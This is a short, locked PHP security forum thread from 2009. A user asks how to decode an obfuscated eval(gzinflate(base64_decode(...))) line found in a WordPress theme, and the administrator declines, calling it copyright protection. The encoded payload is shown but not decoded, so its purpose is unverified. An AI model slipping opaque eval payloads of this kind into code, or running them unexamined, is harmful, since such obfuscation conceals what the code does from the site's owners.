How to decrypt and change this ?

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Locked
pokre
Forum Newbie
Posts: 1
Joined: Sun May 03, 2009 4:00 pm

How to decrypt and change this ?

Post by pokre »

Hello,
i have a problem. In wordpress theme i find this...

Code: Select all

 
<?php eval(gzinflate(base64_decode("fVPBjpswEL1X6j/M+rAhB0DbvW2BHNqueqkUJZX2iBwYsFVju7Ypyt/XBi/ZRNtyQPabN88zfuNdVdylKXRKOTSQptXHD0XL/wBvS7KAxEPgvxUeUI71TWwUceXXglcFBWawK0mx00wDNkxBj6626ByXvU02TA242X6GXZUTcNwJLMl3j5Eq/IucVkXuhVbRWWfSteDW1Zr26DXmNI+U9y1qx8qHRTCWlK81FbYLgZ277eK66pNQPZedSjbG2k/1aMSiT6pv0hmOFpLD8bgNtQKV7b/TGzX4O3O2vtX5EgMXof8UbHjP3lbsjQrO7QVSi9AqkMpBw6jsEZSBFgU6BMe4BcHlL5vBAWnrAfT7BqXFO/jp6SHylG4X78OJX9HyXsLpfOmIOaef8nyapswgFdydrercRA1mDV39e8FTTCbVYaHBMfLmW7p/V7ET1LJBP2pBz2gyZfpV8dkgwnOIw4/9o+81MEgVkdHyJmIX+Zg56dDpgJa8c6BXTSedLoTM25NPyrTaoLU5qV72MXUx5NqS+c5vplqOQ/17xDASyewsxF0WmY4PaGrrlE4eFoLFRsnWE5YX91Yc/ShdPcfX4OsTWIJJnPVAOKn2PDOZG8LQ/wU="))); ?>
 
How to change decrypt this and type anything else. Tnx.
Last edited by Benjamin on Sun May 03, 2009 4:16 pm, edited 2 times in total.
Reason: Added code tags.
User avatar
Benjamin
Site Administrator
Posts: 6935
Joined: Sun May 19, 2002 10:24 pm

Re: How to decrypt and change this ?

Post by Benjamin »

We cannot provide you with support reverse engineering copyright protection mechanisms.

Locked
Locked